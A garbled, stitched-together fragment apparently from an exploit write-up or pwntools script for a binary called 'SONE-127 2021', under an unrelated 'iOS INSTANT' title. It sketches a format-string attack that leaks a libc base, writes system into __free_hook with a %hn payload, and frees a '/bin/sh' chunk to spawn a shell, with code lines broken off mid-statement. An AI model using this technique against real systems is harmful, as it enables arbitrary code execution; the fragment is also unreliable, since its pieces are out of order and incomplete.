Sone-127 2021 «iOS INSTANT»

# 1️⃣ Leak libc libc_base = leak_libc(io)

printf(user_input); Using objdump -d sone127d | grep -i printf : SONE-127 2021

| Function | Purpose | |----------|---------| | leak_libc | Uses the format‑string to leak a libc address and compute the base. | | write_free_hook | Crafts a two‑write %hn payload that stores system at __free_hook . | | get_shell | Uploads a chunk containing /bin/sh and then frees it, invoking system . | | main | Orchestrates the steps and drops b'echo ' + payload) io.recvuntil(b'&gt

io.sendlineafter(b'> ', b'echo ' + payload) io.recvuntil(b'> ') # sync back to prompt SONE-127 2021

# 3️⃣ Get a shell get_shell(io)